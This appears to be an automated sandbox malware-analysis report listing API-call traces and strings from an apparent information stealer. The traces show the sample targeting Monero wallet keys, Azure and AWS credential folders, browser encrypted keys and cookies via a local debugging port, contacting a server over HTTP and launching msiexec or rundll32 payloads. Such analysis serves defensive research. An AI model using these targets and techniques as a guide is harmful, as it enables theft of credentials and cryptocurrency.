                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DD083
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000DD1C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000DD1CE
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD308
                            • lstrcat.KERNEL32(?,000F1570), ref: 000DD317
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD32A
                            • lstrcat.KERNEL32(?,000F1574), ref: 000DD339
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD34C
                            • lstrcat.KERNEL32(?,000F1578), ref: 000DD35B
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD36E
                            • lstrcat.KERNEL32(?,000F157C), ref: 000DD37D
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD390
                            • lstrcat.KERNEL32(?,000F1580), ref: 000DD39F
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD3B2
                            • lstrcat.KERNEL32(?,000F1584), ref: 000DD3C1
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD3D4
                            • lstrcat.KERNEL32(?,000F1588), ref: 000DD3E3
                              • Part of subcall function 000EAB30: lstrlen.KERNEL32(000D4F55,?,?,000D4F55,000F0DDF), ref: 000EAB3B
                              • Part of subcall function 000EAB30: lstrcpy.KERNEL32(000F0DDF,00000000), ref: 000EAB95
                            • lstrlen.KERNEL32(?), ref: 000DD42A
                            • lstrlen.KERNEL32(?), ref: 000DD439
                              • Part of subcall function 000EAD80: StrCmpCA.SHLWAPI(00000000,000F1568,000DD2A2,000F1568,00000000), ref: 000EAD9F
                            • DeleteFileA.KERNEL32(00000000), ref: 000DD4B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 0b9e9e5303e49f83a33bb7d75c4f6c828a9dc159c8d41744816f028ec652d96a
                            • Instruction ID: a746241cd4319653d21cc3bb4bf271285ab226ecf1d41e2691d0638cfe6bcde0
                            • Opcode Fuzzy Hash: 0b9e9e5303e49f83a33bb7d75c4f6c828a9dc159c8d41744816f028ec652d96a
                            • Instruction Fuzzy Hash: 7DE13E71E10148AFCB05EBA1DDA6EEE737DAF1A301F114559F106761A2DF31BA08CB62
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00D4CEB8,00000000,?,000F1544,00000000,?,?), ref: 000DCB6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000DCB89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 000DCB95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000DCBA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 000DCBD9
                            • StrStrA.SHLWAPI(?,00D4CF90,000F0B56), ref: 000DCBF7
                            • StrStrA.SHLWAPI(00000000,00D4D0E0), ref: 000DCC1E
                            • StrStrA.SHLWAPI(?,00D4D960,00000000,?,000F1550,00000000,?,00000000,00000000,?,00D49068,00000000,?,000F154C,00000000,?), ref: 000DCDA2
                            • StrStrA.SHLWAPI(00000000,00D4D8E0), ref: 000DCDB9
                              • Part of subcall function 000DC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000DC971
                              • Part of subcall function 000DC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000DC97C
                            • StrStrA.SHLWAPI(?,00D4D8E0,00000000,?,000F1554,00000000,?,00000000,00D49038), ref: 000DCE5A
                            • StrStrA.SHLWAPI(00000000,00D49158), ref: 000DCE71
                              • Part of subcall function 000DC920: lstrcat.KERNEL32(?,000F0B47), ref: 000DCA43
                              • Part of subcall function 000DC920: lstrcat.KERNEL32(?,000F0B4B), ref: 000DCA57
                              • Part of subcall function 000DC920: lstrcat.KERNEL32(?,000F0B4E), ref: 000DCA78
                            • lstrlen.KERNEL32(00000000), ref: 000DCF44
                            • CloseHandle.KERNEL32(00000000), ref: 000DCF9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: b1470e2242fb4e5f224f76cdfcee76ed6c885578692a24b1511cf9568469785f
                            • Instruction ID: f2a47e1e9681595e19f758c3cc2978a90c6801a626daa779e42b25700d9b3d0b
                            • Opcode Fuzzy Hash: b1470e2242fb4e5f224f76cdfcee76ed6c885578692a24b1511cf9568469785f
                            • Instruction Fuzzy Hash: ECE1C772E10148AFCB15EBA5DCA2FEEB779AF59300F014199F10676193EB307A49CB61
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • RegOpenKeyExA.ADVAPI32(00000000,00D4B508,00000000,00020019,00000000,000F05BE), ref: 000E8534
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000E85B6
                            • wsprintfA.USER32 ref: 000E85E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 000E860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E8629
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s
                            • API String ID: 3246050789-1643714437
                            • Opcode ID: dfe7fe80346fcc544ee3921ec5843524da3eced6c7ffdd53062a5d1c13eb5066
                            • Instruction ID: ed8925c111eb96709d4e2964e1282a60b73940d0b24d8ee39c29693a14c82f2a
                            • Opcode Fuzzy Hash: dfe7fe80346fcc544ee3921ec5843524da3eced6c7ffdd53062a5d1c13eb5066
                            • Instruction Fuzzy Hash: 9D811B71A11158AFDB24DB55CD95FEAB7B8BF49700F1086D8F209A6181DF70AB84CFA0
                            APIs
                              • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 000E5000
                            • lstrcat.KERNEL32(?,\.azure\), ref: 000E501D
                              • Part of subcall function 000E4B60: wsprintfA.USER32 ref: 000E4B7C
                              • Part of subcall function 000E4B60: FindFirstFileA.KERNEL32(?,?), ref: 000E4B93
                            • lstrcat.KERNEL32(?,00000000), ref: 000E508C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 000E50A9
                              • Part of subcall function 000E4B60: StrCmpCA.SHLWAPI(?,000F0FC4), ref: 000E4BC1
                              • Part of subcall function 000E4B60: StrCmpCA.SHLWAPI(?,000F0FC8), ref: 000E4BD7
                              • Part of subcall function 000E4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 000E4DCD
                              • Part of subcall function 000E4B60: FindClose.KERNEL32(000000FF), ref: 000E4DE2
                            • lstrcat.KERNEL32(?,00000000), ref: 000E5118
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 000E5135
                              • Part of subcall function 000E4B60: wsprintfA.USER32 ref: 000E4C00
                              • Part of subcall function 000E4B60: StrCmpCA.SHLWAPI(?,000F08D3), ref: 000E4C15
                              • Part of subcall function 000E4B60: wsprintfA.USER32 ref: 000E4C32
                              • Part of subcall function 000E4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 000E4C6E
                              • Part of subcall function 000E4B60: lstrcat.KERNEL32(?,00D4E918), ref: 000E4C9A
                              • Part of subcall function 000E4B60: lstrcat.KERNEL32(?,000F0FE0), ref: 000E4CAC
                              • Part of subcall function 000E4B60: lstrcat.KERNEL32(?,?), ref: 000E4CC0
                              • Part of subcall function 000E4B60: lstrcat.KERNEL32(?,000F0FE4), ref: 000E4CD2
                              • Part of subcall function 000E4B60: lstrcat.KERNEL32(?,?), ref: 000E4CE6
                              • Part of subcall function 000E4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 000E4CFC
                              • Part of subcall function 000E4B60: DeleteFileA.KERNEL32(?), ref: 000E4D81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: 2f0f2a5cbbd2643487b74e37d7c8c7f4e6bbaa730214e350ff74aea762c7c30c
                            • Instruction ID: 20f8a73e33ed18dc85f763a75615f0583a2220603985320289b45ea89286afa9
                            • Opcode Fuzzy Hash: 2f0f2a5cbbd2643487b74e37d7c8c7f4e6bbaa730214e350ff74aea762c7c30c
                            • Instruction Fuzzy Hash: 084185BAA44208ABDB10E770EC97FED733C5B65704F004994B749690C2EEF567C88B92
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000E91FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: a5707631c13f9d99e56a4ff082a673c4fb205d8eb55c39f0d9e1fd75335ffec3
                            • Instruction ID: cdb27bbe00ac77de7c6dc003a8e08a5176aecde48c842732c953d236ac7e9ae0
                            • Opcode Fuzzy Hash: a5707631c13f9d99e56a4ff082a673c4fb205d8eb55c39f0d9e1fd75335ffec3
                            • Instruction Fuzzy Hash: 5871D875A10208AFDB14DFE5DC89FEEB7B9BB49700F108509F616A7295DB34AA04CB60
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000E3415
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000E35AD
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000E373A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: c138bcec4473fb35cc9d2c8a718deaafa960cbbee46c951ff238affe2a4d7072
                            • Instruction ID: 7cdf5a772622c177ca9f9052a0b58b71638e5f4bc9e056d448d7a2f8e2169553
                            • Opcode Fuzzy Hash: c138bcec4473fb35cc9d2c8a718deaafa960cbbee46c951ff238affe2a4d7072
                            • Instruction Fuzzy Hash: 5C120C71E101489ECB15EBA1DDA2FEEB739AF29300F114599E10676193EF343B49CB62
                            APIs
                              • Part of subcall function 000D9A50: InternetOpenA.WININET(000F0AF6,00000001,00000000,00000000,00000000), ref: 000D9A6A
                            • lstrcat.KERNEL32(?,cookies), ref: 000D9CAF
                            • lstrcat.KERNEL32(?,000F12C4), ref: 000D9CC1
                            • lstrcat.KERNEL32(?,?), ref: 000D9CD5
                            • lstrcat.KERNEL32(?,000F12C8), ref: 000D9CE7
                            • lstrcat.KERNEL32(?,?), ref: 000D9CFB
                            • lstrcat.KERNEL32(?,.txt), ref: 000D9D0D
                            • lstrlen.KERNEL32(00000000), ref: 000D9D17
                            • lstrlen.KERNEL32(00000000), ref: 000D9D26
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 3174675846-3542011879
                            • Opcode ID: 0e1dfe65da137517b8448fdf7e06b65bb4faaa8cfa6a4383f3de5444cdf6e1e0
                            • Instruction ID: fc8e1f0620334fc0d953176736dd6256ebef0b2a967cf54f8f213d2ea0c51978
                            • Opcode Fuzzy Hash: 0e1dfe65da137517b8448fdf7e06b65bb4faaa8cfa6a4383f3de5444cdf6e1e0
                            • Instruction Fuzzy Hash: 86517E72910608ABDB14EBE0DC95FEE773CAF55301F408658F20AA7191EF74AA49CF61
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D62D0: InternetOpenA.WININET(000F0DFF,00000001,00000000,00000000,00000000), ref: 000D6331
                              • Part of subcall function 000D62D0: StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D6353
                              • Part of subcall function 000D62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6385
                              • Part of subcall function 000D62D0: HttpOpenRequestA.WININET(00000000,GET,?,00D4DE70,00000000,00000000,00400100,00000000), ref: 000D63D5
                              • Part of subcall function 000D62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D640F
                              • Part of subcall function 000D62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D6421
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5568
                            • lstrlen.KERNEL32(00000000), ref: 000E557F
                              • Part of subcall function 000E8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8FE2
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 000E55B4
                            • lstrlen.KERNEL32(00000000), ref: 000E55D3
                            • lstrlen.KERNEL32(00000000), ref: 000E55FE
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: cb5fe60a3edf44f71ba6e680d7ec93ae3b089cd4b5b3c1da57f1ec2052b041d3
                            • Instruction ID: 658c836a152d2b369487f4fd332a7bba4b3c0a049f8e31cdd3231eb34a6ba3d9
                            • Opcode Fuzzy Hash: cb5fe60a3edf44f71ba6e680d7ec93ae3b089cd4b5b3c1da57f1ec2052b041d3
                            • Instruction Fuzzy Hash: 22510930A10188EFCB14EF61DDA6AED7779AF25341F514468E50A6B593EF307B04CB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: b5e4161cf329b9c91233966ce2a39f923ce5a78d16681ba4a6dbf802c79e5814
                            • Instruction ID: 2c9069aa70d155de4b15661bee40fcd0c4b40c8719c61676e050d42bf1eff04c
                            • Opcode Fuzzy Hash: b5e4161cf329b9c91233966ce2a39f923ce5a78d16681ba4a6dbf802c79e5814
                            • Instruction Fuzzy Hash: 0EC192B5E001199FCB14EF60DC99FEE7379AF58304F004599E509A7283EB70AA85CF91
                            APIs
                              • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 000E453C
                            • lstrcat.KERNEL32(?,00D4E488), ref: 000E455B
                            • lstrcat.KERNEL32(?,?), ref: 000E456F
                            • lstrcat.KERNEL32(?,00D4CEA0), ref: 000E4583
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000E8F20: GetFileAttributesA.KERNEL32(00000000,?,000D1B94,?,?,000F577C,?,?,000F0E22), ref: 000E8F2F
                              • Part of subcall function 000DA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000DA489
                              • Part of subcall function 000DA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                              • Part of subcall function 000DA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                              • Part of subcall function 000DA110: LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                              • Part of subcall function 000DA110: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                              • Part of subcall function 000DA110: LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                              • Part of subcall function 000DA110: CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                              • Part of subcall function 000E9550: GlobalAlloc.KERNEL32(00000000,000E462D,000E462D), ref: 000E9563
                            • StrStrA.SHLWAPI(?,00D4E608), ref: 000E4643
                            • GlobalFree.KERNEL32(?), ref: 000E4762
                              • Part of subcall function 000DA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA23F
                              • Part of subcall function 000DA210: LocalAlloc.KERNEL32(00000040,?,?,?,000D4F3E,00000000,?), ref: 000DA251
                              • Part of subcall function 000DA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA27A
                              • Part of subcall function 000DA210: LocalFree.KERNEL32(?,?,?,?,000D4F3E,00000000,?), ref: 000DA28F
                            • lstrcat.KERNEL32(?,00000000), ref: 000E46F3
                            • StrCmpCA.SHLWAPI(?,000F08D2), ref: 000E4710
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000E4722
                            • lstrcat.KERNEL32(00000000,?), ref: 000E4735
                            • lstrcat.KERNEL32(00000000,000F0FA0), ref: 000E4744
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: d4876d60b170a035bded73a04eff749c15862262cae004b41f98bf916567f82a
                            • Instruction ID: b58a005627666683c98bf83e98bce05a69db524326888cedbba4857e8bc4ae46
                            • Opcode Fuzzy Hash: d4876d60b170a035bded73a04eff749c15862262cae004b41f98bf916567f82a
                            • Instruction Fuzzy Hash: 827149B6E00208ABDB14EBA0DD95FDE777DAB89300F048598F60567152EB35EB44CF51
                            APIs
                              • Part of subcall function 000D12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000D12B4
                              • Part of subcall function 000D12A0: RtlAllocateHeap.NTDLL(00000000), ref: 000D12BB
                              • Part of subcall function 000D12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000D12D7
